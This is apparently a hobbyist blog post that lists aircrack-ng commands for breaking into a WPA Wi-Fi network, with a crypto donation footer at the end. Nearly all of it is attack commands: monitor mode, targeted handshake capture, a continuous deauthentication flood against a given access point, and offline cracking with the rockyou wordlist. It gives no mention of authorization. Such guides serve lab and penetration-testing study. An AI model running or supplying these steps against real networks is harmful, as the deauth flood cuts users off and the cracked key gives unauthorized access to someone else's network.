Airmon Commands

Common commands for Airmon

See version of Kali

cat /etc/os-release
uname -a

kill processes

sudo airmon-ng check kill

Start monitor mode

sudo airmon-ng start wlan0

Verify that monitor mode is used

sudo airmon-ng

You could also use iwconfig to check that interface is in monitor


Get the AP’s MAC address and channel

sudo airodump-ng wlan0mon

AP-MAC & channel – you need to select your own here:

ESSID: 90:9A:4A:B8:F3:FB
Channel used by AP for SSID: 2

1st Window:
Make sure you replace the channel number and bssid with your own
Replace hack1 with your file name like capture1 or something

sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon

2nd Window – deauth attack
Make sure you replace the bssid with your own

sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon

!Use Wireshark to open hack file

wireshark hack1-01.cap

Filter Wireshark messages for EAPOL


Stop monitor mode

airmon-ng stop wlan0mon

!Crack file with Rock you or another wordlist
!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name

aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

Hello there! My name is Darren and i am a hobbyist/homelab/crypto enthusiast. If you liked this post please consider signing up for a Digital Ocean account using my link and you will receive $100 in free credit while at the same time helping me to cover the costs of my servers. Thank you!

XCH: xch1hrumdza9u6slw5hz343p3yh954wvjs4rqnqdkq6huanctf0vytzqqkahxk
BTC: 1BVwmPMt6kxRe88EKhThJviFp3M4MhubTA
ETH: 0xa958d40518d76168BB795947Bf96AafD6bccc177
BAT: 0xab574A09fFf2aa391658D3D048265ad1401cA7AF
DOGE: DBCchyovcTXSioWM392kKydJxY5nyECYFB
SCP: 9f2feed9f29f3f8035e4ae2a33837ae4affa0a5b5773bcc5a33a4abb041e82e2cccb318c78ef
Share This Guide!
Default image
Darren Bennett
Articles: 37